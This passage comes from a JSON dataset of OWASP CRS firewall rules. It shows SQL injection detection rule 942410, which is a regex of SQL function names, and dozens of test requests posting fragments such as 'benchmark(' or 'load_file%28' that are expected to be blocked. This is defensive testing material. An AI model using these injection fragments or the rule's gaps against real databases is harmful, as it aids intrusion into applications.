"act_arg": "OWASP_CRS", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "tag", "lineno": 1183, "act_quote": "quotes", "act_arg": "OWASP_CRS/ATTACK-SQLI", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "tag", "lineno": 1184, "act_quote": "quotes", "act_arg": "capec/1000/152/248/66", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "ver", "lineno": 1185, "act_quote": "quotes", "act_arg": "OWASP_CRS/4.21.0-dev", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "severity", "lineno": 1186, "act_quote": "quotes", "act_arg": "CRITICAL", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "setvar", "lineno": 1187, "act_quote": "quotes", "act_arg": "tx.sql_injection_score=+%{tx.critical_anomaly_score}", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "setvar", "lineno": 1188, "act_quote": "quotes", "act_arg": "tx.inbound_anomaly_score_pl2=+%{tx.critical_anomaly_score}", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" } ], "chained": false, "operator_negated": false, "oplineno": 1169 } }, { "rule_id": "942410", "has_tests": true, "detection": { "variables": [ { "name": "REQUEST_COOKIES", "part": "", "negated": false }, { "name": "REQUEST_COOKIES", "part": "/_pk_ref/", "negated": true }, { "name": "REQUEST_COOKIES_NAMES", "part": "", "negated": false }, { "name": "ARGS_NAMES", "part": "", "negated": false }, { "name": "ARGS", "part": "", "negated": false }, { "name": "XML", "part": "/*", "negated": false } ], "operator": { "type": "@rx", "argument": "(?i)\\b(?:a(?:(?:b|co)s|dd(?:dat|tim)e|es_(?:de|en)crypt|s(?:in|cii(?:str)?)|tan2?|vg)|b(?:enchmark|i(?:n(?:_to_num)?|t_(?:and|count|length|x?or)))|c(?:ast|h(?:ar(?:(?:acter)?_length|set)?|r)|iel(?:ing)?|o(?:alesce|ercibility|(?:mpres)?s|n(?:cat(?:_ws)?|nection_id|v(?:ert(?:_tz)?)?)|(?:un)?t)|r32|ur(?:(?:dat|tim)e|rent_(?:date|time(?:stamp)?|user)))|d(?:a(?:t(?:abase|e(?:_(?:add|format|sub)|diff)?)|y(?:name|of(?:month|week|year))?)|count|e(?:code|(?:faul|s_(?:de|en)cryp)t|grees)|ump)|e(?:lt|nc(?:ode|rypt)|x(?:p(?:ort_set)?|tract(?:value)?))|f(?:i(?:eld(?:_in_set)?|nd_in_set)|loor|o(?:rmat|und_rows)|rom_(?:base64|days|unixtime))|g(?:et_(?:format|lock)|r(?:eates|oup_conca)t)|h(?:ex(?:toraw)?|our)|i(?:f(?:null)?|n(?:et6?_(?:aton|ntoa)|s(?:ert|tr)|terval)?|s(?:_(?:(?:free|used)_lock|ipv(?:4(?:_(?:compat|mapped))?|6)|n(?:ot(?:_null)?|ull))|null)?)|l(?:ast(?:_(?:day|insert_id))?|case|e(?:(?:as|f)t|ngth)|n|o(?:ad_file|ca(?:l(?:timestamp)?|te)|g(?:10|2)?|wer)|pad|trim)|m(?:a(?:ke(?:date|_set)|ster_pos_wait|x)|d5|i(?:(?:crosecon)?d|n(?:ute)?)|o(?:d|nth(?:name)?))|n(?:ame_const|o(?:t_in|w)|ullif)|o(?:ct(?:et_length)?|(?:ld_passwo)?rd)|p(?:assword|eriod_(?:add|diff)|g_sleep|i|o(?:sition|w(?:er)?)|rocedure_analyse)|qu(?:arter|ote)|r(?:a(?:dians|nd|wto(?:hex|nhex(?:toraw)?))|e(?:lease_lock|p(?:eat|lace)|verse)|ight|o(?:und|w_count)|pad|trim)|s(?:chema|e(?:c(?:ond|_to_time)|ssion_user)|ha[12]?|ig?n|leep|oundex|pace|qrt|t(?:d(?:dev(?:_(?:po|sam)p)?)?|r(?:cmp|_to_date))|u(?:b(?:(?:dat|tim)e|str(?:ing(?:_index)?)?)|m)|ys(?:date|tem_user))|t(?:an|ime(?:diff|_(?:format|to_sec)|stamp(?:add|diff)?)?|o_(?:base64|n?char|(?:day|second)s)|r(?:im|uncate))|u(?:case|n(?:compress(?:ed_length)?|hex|ix_timestamp)|p(?:datexml|per)|ser|tc_(?:date|time(?:stamp)?)|uid(?:_short)?)|v(?:a(?:lues|r(?:iance|_(?:po|sam)p))|ersion)|we(?:ek(?:day|ofyear)?|ight_string)|xmltype|year(?:week)?)[^0-9A-Z_a-z]*?\\(", "negated": false } }, "transformations": [ "none", "urlDecodeUni" ], "metadata": { "phase": "2", "message": "SQL Injection Attack", "logdata": "Matched Data: %{TX.0} found within %{MATCHED_VAR_NAME}: %{MATCHED_VAR}", "version": "OWASP_CRS/4.21.0-dev" }, "attack_info": { "type": [ "attack-sqli" ], "severity": "CRITICAL", "tags": [ "application-multi", "language-multi", "platform-multi", "attack-sqli", "paranoia-level/2", "OWASP_CRS", "OWASP_CRS/ATTACK-SQLI", "capec/1000/152/248/66" ] }, "test_cases": [ { "description": "SQL Injection Attack", "test_id": 1, "request": { "method": "POST", "uri": "/post", "headers": { "Host": "localhost", "User-Agent": "OWASP CRS test agent", "Accept": "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" }, "data": "ABS(" }, "expected": { "should_block": true, "rule_ids": [ 942410 ] }, "malicious_patterns": [ { "location": "post_body", "value": "ABS(" } ] }, { "description": "SQL Injection Attack", "test_id": 2, "request": { "method": "POST", "uri": "/post", "headers": { "Host": "localhost", "User-Agent": "OWASP CRS test agent", "Accept": "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" }, "data": "benchmark(" }, "expected": { "should_block": true, "rule_ids": [ 942410 ] }, "malicious_patterns": [ { "location": "post_body", "value": "benchmark(" } ] }, { "description": "SQL Injection Attack", "test_id": 3, "request": { "method": "POST", "uri": "/post", "headers": { "Host": "localhost", "User-Agent": "OWASP CRS test agent", "Accept": "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" }, "data": "BENChmARk(" }, "expected": { "should_block": true, "rule_ids": [ 942410 ] }, "malicious_patterns": [ { "location": "post_body", "value": "BENChmARk(" } ] }, { "description": "SQL Injection Attack", "test_id": 4, "request": { "method": "POST", "uri": "/post", "headers": { "Host": "localhost", "User-Agent": "OWASP CRS test agent", "Accept": "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" }, "data": "cast(" }, "expected": { "should_block": true, "rule_ids": [ 942410 ] }, "malicious_patterns": [ { "location": "post_body", "value": "cast(" } ] }, { "description": "SQL Injection Attack", "test_id": 5, "request": { "method": "POST", "uri": "/post", "headers": { "Host": "localhost", "User-Agent": "OWASP CRS test agent", "Accept": "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" }, "data": "CAST(" }, "expected": { "should_block": true, "rule_ids": [ 942410 ] }, "malicious_patterns": [ { "location": "post_body", "value": "CAST(" } ] }, { "description": "SQL Injection Attack", "test_id": 6, "request": { "method": "POST", "uri": "/post", "headers": { "Host": "localhost", "User-Agent": "OWASP CRS test agent", "Accept": "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" }, "data": "char(" }, "expected": { "should_block": true, "rule_ids": [ 942410 ] }, "malicious_patterns": [ { "location": "post_body", "value": "char(" } ] }, { "description": "SQL Injection Attack", "test_id": 7, "request": { "method": "POST", "uri": "/post", "headers": { "Host": "localhost", "User-Agent": "OWASP CRS test agent", "Accept": "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" }, "data": "chaR(" }, "expected": { "should_block": true, "rule_ids": [ 942410 ] }, "malicious_patterns": [ { "location": "post_body", "value": "chaR(" } ] }, { "description": "SQL Injection Attack", "test_id": 8, "request": { "method": "POST", "uri": "/post", "headers": { "Host": "localhost", "User-Agent": "OWASP CRS test agent", "Accept": "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" }, "data": "chr(" }, "expected": { "should_block": true, "rule_ids": [ 942410 ] }, "malicious_patterns": [ { "location": "post_body", "value": "chr(" } ] }, { "description": "SQL Injection Attack", "test_id": 9, "request": { "method": "POST", "uri": "/post", "headers": { "Host": "localhost", "User-Agent": "OWASP CRS test agent", "Accept": "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" }, "data": "CHR(" }, "expected": { "should_block": true, "rule_ids": [ 942410 ] }, "malicious_patterns": [ { "location": "post_body", "value": "CHR(" } ] }, { "description": "SQL Injection Attack", "test_id": 10, "request": { "method": "POST", "uri": "/post", "headers": { "Host": "localhost", "User-Agent": "OWASP CRS test agent", "Accept": "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" }, "data": "COALESCE(" }, "expected": { "should_block": true, "rule_ids": [ 942410 ] }, "malicious_patterns": [ { "location": "post_body", "value": "COALESCE(" } ] }, { "description": "SQL Injection Attack", "test_id": 11, "request": { "method": "POST", "uri": "/post", "headers": { "Host": "localhost", "User-Agent": "OWASP CRS test agent", "Accept": "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" }, "data": "Compress (" }, "expected": { "should_block": true, "rule_ids": [ 942410 ] }, "malicious_patterns": [ { "location": "post_body", "value": "Compress (" } ] }, { "description": "SQL Injection Attack", "test_id": 12, "request": { "method": "POST", "uri": "/post", "headers": { "Host": "localhost", "User-Agent": "OWASP CRS test agent", "Accept": "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" }, "data": "concat (" }, "expected": { "should_block": true, "rule_ids": [ 942410 ] }, "malicious_patterns": [ { "location": "post_body", "value": "concat (" } ] }, { "description": "SQL Injection Attack", "test_id": 13, "request": { "method": "POST", "uri": "/post", "headers": { "Host": "localhost", "User-Agent": "OWASP CRS test agent", "Accept": "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" }, "data": "cOnCaT(" }, "expected": { "should_block": true, "rule_ids": [ 942410 ] }, "malicious_patterns": [ { "location": "post_body", "value": "cOnCaT(" } ] }, { "description": "SQL Injection Attack", "test_id": 14, "request": { "method": "POST", "uri": "/post", "headers": { "Host": "localhost", "User-Agent": "OWASP CRS test agent", "Accept": "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" }, "data": "concat_ws(" }, "expected": { "should_block": true, "rule_ids": [ 942410 ] }, "malicious_patterns": [ { "location": "post_body", "value": "concat_ws(" } ] }, { "description": "SQL Injection Attack", "test_id": 15, "request": { "method": "POST", "uri": "/post", "headers": { "Host": "localhost", "User-Agent": "OWASP CRS test agent", "Accept": "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" }, "data": "convert(" }, "expected": { "should_block": true, "rule_ids": [ 942410 ] }, "malicious_patterns": [ { "location": "post_body", "value": "convert(" } ] }, { "description": "SQL Injection Attack", "test_id": 16, "request": { "method": "POST", "uri": "/post", "headers": { "Host": "localhost", "User-Agent": "OWASP CRS test agent", "Accept": "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" }, "data": "cOnVeRt(" }, "expected": { "should_block": true, "rule_ids": [ 942410 ] }, "malicious_patterns": [ { "location": "post_body", "value": "cOnVeRt(" } ] }, { "description": "SQL Injection Attack", "test_id": 17, "request": { "method": "POST", "uri": "/post", "headers": { "Host": "localhost", "User-Agent": "OWASP CRS test agent", "Accept": "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" }, "data": "COS(" }, "expected": { "should_block": true, "rule_ids": [ 942410 ] }, "malicious_patterns": [ { "location": "post_body", "value": "COS(" } ] }, { "description": "SQL Injection Attack", "test_id": 18, "request": { "method": "POST", "uri": "/post", "headers": { "Host": "localhost", "User-Agent": "OWASP CRS test agent", "Accept": "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" }, "data": "COUNT(" }, "expected": { "should_block": true, "rule_ids": [ 942410 ] }, "malicious_patterns": [ { "location": "post_body", "value": "COUNT(" } ] }, { "description": "SQL Injection Attack", "test_id": 19, "request": { "method": "POST", "uri": "/post", "headers": { "Host": "localhost", "User-Agent": "OWASP CRS test agent", "Accept": "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" }, "data": "CURRENT_USER(" }, "expected": { "should_block": true, "rule_ids": [ 942410 ] }, "malicious_patterns": [ { "location": "post_body", "value": "CURRENT_USER(" } ] }, { "description": "SQL Injection Attack", "test_id": 20, "request": { "method": "POST", "uri": "/post", "headers": { "Host": "localhost", "User-Agent": "OWASP CRS test agent", "Accept": "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" }, "data": "database (" }, "expected": { "should_block": true, "rule_ids": [ 942410 ] }, "malicious_patterns": [ { "location": "post_body", "value": "database (" } ] }, { "description": "SQL Injection Attack", "test_id": 21, "request": { "method": "POST", "uri": "/post", "headers": { "Host": "localhost", "User-Agent": "OWASP CRS test agent", "Accept": "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" }, "data": "date(" }, "expected": { "should_block": true, "rule_ids": [ 942410 ] }, "malicious_patterns": [ { "location": "post_body", "value": "date(" } ] }, { "description": "SQL Injection Attack", "test_id": 22, "request": { "method": "POST", "uri": "/post", "headers": { "Host": "localhost", "User-Agent": "OWASP CRS test agent", "Accept": "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" }, "data": "pay=date%5D%3D%28" }, "expected": { "should_block": true, "rule_ids": [ 942410 ] }, "malicious_patterns": [ { "location": "post_body", "value": "pay=date%5D%3D%28" } ] }, { "description": "SQL Injection Attack", "test_id": 23, "request": { "method": "POST", "uri": "/post", "headers": { "Host": "localhost", "User-Agent": "OWASP CRS test agent", "Accept": "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" }, "data": "pay=day.+%28" }, "expected": { "should_block": true, "rule_ids": [ 942410 ] }, "malicious_patterns": [ { "location": "post_body", "value": "pay=day.+%28" } ] }, { "description": "SQL Injection Attack", "test_id": 24, "request": { "method": "POST", "uri": "/post", "headers": { "Host": "localhost", "User-Agent": "OWASP CRS test agent", "Accept": "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" }, "data": "pay=day%26%27%28" }, "expected": { "should_block": true, "rule_ids": [ 942410 ] }, "malicious_patterns": [ { "location": "post_body", "value": "pay=day%26%27%28" } ] }, { "description": "SQL Injection Attack", "test_id": 25, "request": { "method": "POST", "uri": "/post", "headers": { "Host": "localhost", "User-Agent": "OWASP CRS test agent", "Accept": "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" }, "data": "pay=decode%28" }, "expected": { "should_block": true, "rule_ids": [ 942410 ] }, "malicious_patterns": [ { "location": "post_body", "value": "pay=decode%28" } ] }, { "description": "SQL Injection Attack", "test_id": 26, "request": { "method": "POST", "uri": "/post", "headers": { "Host": "localhost", "User-Agent": "OWASP CRS test agent", "Accept": "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" }, "data": "pay=default%28" }, "expected": { "should_block": true, "rule_ids": [ 942410 ] }, "malicious_patterns": [ { "location": "post_body", "value": "pay=default%28" } ] }, { "description": "SQL Injection Attack", "test_id": 27, "request": { "method": "POST", "uri": "/post", "headers": { "Host": "localhost", "User-Agent": "OWASP CRS test agent", "Accept": "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" }, "data": "pay=ELT%28" }, "expected": { "should_block": true, "rule_ids": [ 942410 ] }, "malicious_patterns": [ { "location": "post_body", "value": "pay=ELT%28" } ] }, { "description": "SQL Injection Attack", "test_id": 28, "request": { "method": "POST", "uri": "/post", "headers": { "Host": "localhost", "User-Agent": "OWASP CRS test agent", "Accept": "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" }, "data": "pay=encode%3D%28" }, "expected": { "should_block": true, "rule_ids": [ 942410 ] }, "malicious_patterns": [ { "location": "post_body", "value": "pay=encode%3D%28" } ] }, { "description": "SQL Injection Attack", "test_id": 29, "request": { "method": "POST", "uri": "/post", "headers": { "Host": "localhost", "User-Agent": "OWASP CRS test agent", "Accept": "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" }, "data": "pay=ExtractValue%28" }, "expected": { "should_block": true, "rule_ids": [ 942410 ] }, "malicious_patterns": [ { "location": "post_body", "value": "pay=ExtractValue%28" } ] }, { "description": "SQL Injection Attack", "test_id": 30, "request": { "method": "POST", "uri": "/post", "headers": { "Host": "localhost", "User-Agent": "OWASP CRS test agent", "Accept": "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" }, "data": "pay=EXTRACTVALUE%28" }, "expected": { "should_block": true, "rule_ids": [ 942410 ] }, "malicious_patterns": [ { "location": "post_body", "value": "pay=EXTRACTVALUE%28" } ] }, { "description": "SQL Injection Attack", "test_id": 31, "request": { "method": "POST", "uri": "/post", "headers": { "Host": "localhost", "User-Agent": "OWASP CRS test agent", "Accept": "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" }, "data": "pay=floor%28" }, "expected": { "should_block": true, "rule_ids": [ 942410 ] }, "malicious_patterns": [ { "location": "post_body", "value": "pay=floor%28" } ] }, { "description": "SQL Injection Attack", "test_id": 32, "request": { "method": "POST", "uri": "/post", "headers": { "Host": "localhost", "User-Agent": "OWASP CRS test agent", "Accept": "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" }, "data": "pay=FLOOR+%28" }, "expected": { "should_block": true, "rule_ids": [ 942410 ] }, "malicious_patterns": [ { "location": "post_body", "value": "pay=FLOOR+%28" } ] }, { "description": "SQL Injection Attack", "test_id": 33, "request": { "method": "POST", "uri": "/post", "headers": { "Host": "localhost", "User-Agent": "OWASP CRS test agent", "Accept": "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" }, "data": "pay=format%28" }, "expected": { "should_block": true, "rule_ids": [ 942410 ] }, "malicious_patterns": [ { "location": "post_body", "value": "pay=format%28" } ] }, { "description": "SQL Injection Attack", "test_id": 34, "request": { "method": "POST", "uri": "/post", "headers": { "Host": "localhost", "User-Agent": "OWASP CRS test agent", "Accept": "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" }, "data": "pay=GROUP_CONCAT%28" }, "expected": { "should_block": true, "rule_ids": [ 942410 ] }, "malicious_patterns": [ { "location": "post_body", "value": "pay=GROUP_CONCAT%28" } ] }, { "description": "SQL Injection Attack", "test_id": 35, "request": { "method": "POST", "uri": "/post", "headers": { "Host": "localhost", "User-Agent": "OWASP CRS test agent", "Accept": "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" }, "data": "pay=hex%28" }, "expected": { "should_block": true, "rule_ids": [ 942410 ] }, "malicious_patterns": [ { "location": "post_body", "value": "pay=hex%28" } ] }, { "description": "SQL Injection Attack", "test_id": 36, "request": { "method": "POST", "uri": "/post", "headers": { "Host": "localhost", "User-Agent": "OWASP CRS test agent", "Accept": "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" }, "data": "pay=hEx%28" }, "expected": { "should_block": true, "rule_ids": [ 942410 ] }, "malicious_patterns": [ { "location": "post_body", "value": "pay=hEx%28" } ] }, { "description": "SQL Injection Attack", "test_id": 37, "request": { "method": "POST", "uri": "/post", "headers": { "Host": "localhost", "User-Agent": "OWASP CRS test agent", "Accept": "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" }, "data": "pay=if+%21%28" }, "expected": { "should_block": true, "rule_ids": [ 942410 ] }, "malicious_patterns": [ { "location": "post_body", "value": "pay=if+%21%28" } ] }, { "description": "SQL Injection Attack", "test_id": 38, "request": { "method": "POST", "uri": "/post", "headers": { "Host": "localhost", "User-Agent": "OWASP CRS test agent", "Accept": "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" }, "data": "pay=if+%28" }, "expected": { "should_block": true, "rule_ids": [ 942410 ] }, "malicious_patterns": [ { "location": "post_body", "value": "pay=if+%28" } ] }, { "description": "SQL Injection Attack", "test_id": 39, "request": { "method": "POST", "uri": "/post", "headers": { "Host": "localhost", "User-Agent": "OWASP CRS test agent", "Accept": "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" }, "data": "pay=if%28" }, "expected": { "should_block": true, "rule_ids": [ 942410 ] }, "malicious_patterns": [ { "location": "post_body", "value": "pay=if%28" } ] }, { "description": "SQL Injection Attack", "test_id": 40, "request": { "method": "POST", "uri": "/post", "headers": { "Host": "localhost", "User-Agent": "OWASP CRS test agent", "Accept": "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" }, "data": "pay=if%5C%28" }, "expected": { "should_block": true, "rule_ids": [ 942410 ] }, "malicious_patterns": [ { "location": "post_body", "value": "pay=if%5C%28" } ] }, { "description": "SQL Injection Attack", "test_id": 41, "request": { "method": "POST", "uri": "/post", "headers": { "Host": "localhost", "User-Agent": "OWASP CRS test agent", "Accept": "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" }, "data": "pay=IFNULL%28" }, "expected": { "should_block": true, "rule_ids": [ 942410 ] }, "malicious_patterns": [ { "location": "post_body", "value": "pay=IFNULL%28" } ] }, { "description": "SQL Injection Attack", "test_id": 42, "request": { "method": "POST", "uri": "/post", "headers": { "Host": "localhost", "User-Agent": "OWASP CRS test agent", "Accept": "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" }, "data": "pay=in+%27%24%28" }, "expected": { "should_block": true, "rule_ids": [ 942410 ] }, "malicious_patterns": [ { "location": "post_body", "value": "pay=in+%27%24%28" } ] }, { "description": "SQL Injection Attack", "test_id": 43, "request": { "method": "POST", "uri": "/post", "headers": { "Host": "localhost", "User-Agent": "OWASP CRS test agent", "Accept": "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" }, "data": "pay=IN+%28" }, "expected": { "should_block": true, "rule_ids": [ 942410 ] }, "malicious_patterns": [ { "location": "post_body", "value": "pay=IN+%28" } ] }, { "description": "SQL Injection Attack", "test_id": 44, "request": { "method": "POST", "uri": "/post", "headers": { "Host": "localhost", "User-Agent": "OWASP CRS test agent", "Accept": "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" }, "data": "pay=IN%2F%2A%2A%2F%28" }, "expected": { "should_block": true, "rule_ids": [ 942410 ] }, "malicious_patterns": [ { "location": "post_body", "value": "pay=IN%2F%2A%2A%2F%28" } ] }, { "description": "SQL Injection Attack", "test_id": 45, "request": { "method": "POST", "uri": "/post", "headers": { "Host": "localhost", "User-Agent": "OWASP CRS test agent", "Accept": "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" }, "data": "pay=insert%28" }, "expected": { "should_block": true, "rule_ids": [ 942410 ] }, "malicious_patterns": [ { "location": "post_body", "value": "pay=insert%28" } ] }, { "description": "SQL Injection Attack", "test_id": 46, "request": { "method": "POST", "uri": "/post", "headers": { "Host": "localhost", "User-Agent": "OWASP CRS test agent", "Accept": "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" }, "data": "pay=left%27%29%3F%24%28" }, "expected": { "should_block": true, "rule_ids": [ 942410 ] }, "malicious_patterns": [ { "location": "post_body", "value": "pay=left%27%29%3F%24%28" } ] }, { "description": "SQL Injection Attack", "test_id": 47, "request": { "method": "POST", "uri": "/post", "headers": { "Host": "localhost", "User-Agent": "OWASP CRS test agent", "Accept": "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" }, "data": "pay=LEFT%28" }, "expected": { "should_block": true, "rule_ids": [ 942410 ] }, "malicious_patterns": [ { "location": "post_body", "value": "pay=LEFT%28" } ] }, { "description": "SQL Injection Attack", "test_id": 48, "request": { "method": "POST", "uri": "/post", "headers": { "Host": "localhost", "User-Agent": "OWASP CRS test agent", "Accept": "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" }, "data": "pay=length%7C%7C%21%21%24%28" }, "expected": { "should_block": true, "rule_ids": [ 942410 ] }, "malicious_patterns": [ { "location": "post_body", "value": "pay=length%7C%7C%21%21%24%28" } ] }, { "description": "SQL Injection Attack", "test_id": 49, "request": { "method": "POST", "uri": "/post", "headers": { "Host": "localhost", "User-Agent": "OWASP CRS test agent", "Accept": "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" }, "data": "pay=length%7C%7C%28" }, "expected": { "should_block": true, "rule_ids": [ 942410 ] }, "malicious_patterns": [ { "location": "post_body", "value": "pay=length%7C%7C%28" } ] }, { "description": "SQL Injection Attack", "test_id": 50, "request": { "method": "POST", "uri": "/post", "headers": { "Host": "localhost", "User-Agent": "OWASP CRS test agent", "Accept": "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" }, "data": "pay=length%3F%28" }, "expected": { "should_block": true, "rule_ids": [ 942410 ] }, "malicious_patterns": [ { "location": "post_body", "value": "pay=length%3F%28" } ] }, { "description": "SQL Injection Attack", "test_id": 51, "request": { "method": "POST", "uri": "/post", "headers": { "Host": "localhost", "User-Agent": "OWASP CRS test agent", "Accept": "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" }, "data": "pay=length%26%26%21%21%21%24%28" }, "expected": { "should_block": true, "rule_ids": [ 942410 ] }, "malicious_patterns": [ { "location": "post_body", "value": "pay=length%26%26%21%21%21%24%28" } ] }, { "description": "SQL Injection Attack", "test_id": 52, "request": { "method": "POST", "uri": "/post", "headers": { "Host": "localhost", "User-Agent": "OWASP CRS test agent", "Accept": "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" }, "data": "pay=length%26%26%28" }, "expected": { "should_block": true, "rule_ids": [ 942410 ] }, "malicious_patterns": [ { "location": "post_body", "value": "pay=length%26%26%28" } ] }, { "description": "SQL Injection Attack", "test_id": 53, "request": { "method": "POST", "uri": "/post", "headers": { "Host": "localhost", "User-Agent": "OWASP CRS test agent", "Accept": "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" }, "data": "pay=LENGTH%28" }, "expected": { "should_block": true, "rule_ids": [ 942410 ] }, "malicious_patterns": [ { "location": "post_body", "value": "pay=LENGTH%28" } ] }, { "description": "SQL Injection Attack", "test_id": 54, "request": { "method": "POST", "uri": "/post", "headers": { "Host": "localhost", "User-Agent": "OWASP CRS test agent", "Accept": "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" }, "data": "pay=ln+%28" }, "expected": { "should_block": true, "rule_ids": [ 942410 ] }, "malicious_patterns": [ { "location": "post_body", "value": "pay=ln+%28" } ] }, { "description": "SQL Injection Attack", "test_id": 55, "request": { "method": "POST", "uri": "/post", "headers": { "Host": "localhost", "User-Agent": "OWASP CRS test agent", "Accept": "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" }, "data": "pay=ln%29+%28" }, "expected": { "should_block": true, "rule_ids": [ 942410 ] }, "malicious_patterns": [ { "location": "post_body", "value": "pay=ln%29+%28" } ] }, { "description": "SQL Injection Attack", "test_id": 56, "request": { "method": "POST", "uri": "/post", "headers": { "Host": "localhost", "User-Agent": "OWASP CRS test agent", "Accept": "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" }, "data": "pay=load_file%28" }, "expected": { "should_block": true, "rule_ids": [ 942410 ] }, "malicious_patterns": [ { "location": "post_body", "value": "pay=load_file%28" } ] }, { "description": "SQL Injection Attack", "test_id": 57, "request": { "method": "POST", "uri": "/post", "headers": { "Host": "localhost", "User-Agent": "OWASP CRS test agent", "Accept": "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" }, 